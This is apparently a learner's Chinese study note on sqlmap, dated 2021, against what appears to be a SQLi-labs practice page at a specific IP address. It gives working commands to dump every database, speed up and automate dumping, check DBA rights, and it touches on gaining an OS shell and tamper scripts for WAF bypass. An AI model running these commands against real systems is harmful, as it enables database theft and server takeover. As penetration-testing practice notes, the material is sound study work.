2021-9-16 继续昨天的 加油!
六、脱库
脱数据库
--dump-all
sqlmap -u "http://106.52.39.144/Less-1/?id=1" --dump-all
sqlmap -u "http://106.52.39.144/Less-1/?id=1" -D security --dump
七、调线程
--thread 调线程 范围1-10
sqlmap -u "http://106.52.39.144/Less-1/?id=1" -D security --dump --thread 10
--batch 不会再跳出询问选择 ,按照默认选择进行选择
sqlmap -u "http://106.52.39.144/Less-1/?id=1" --dump-all --thread 10 --batch
--os-shell
1、不知道对方网站的绝对目录
2、对此目录没有写权限
3、对木马没有解析的权限
--is-dba 查看权限
sqlmap 有一个tamper目录
这里放了一些脚本 绕waf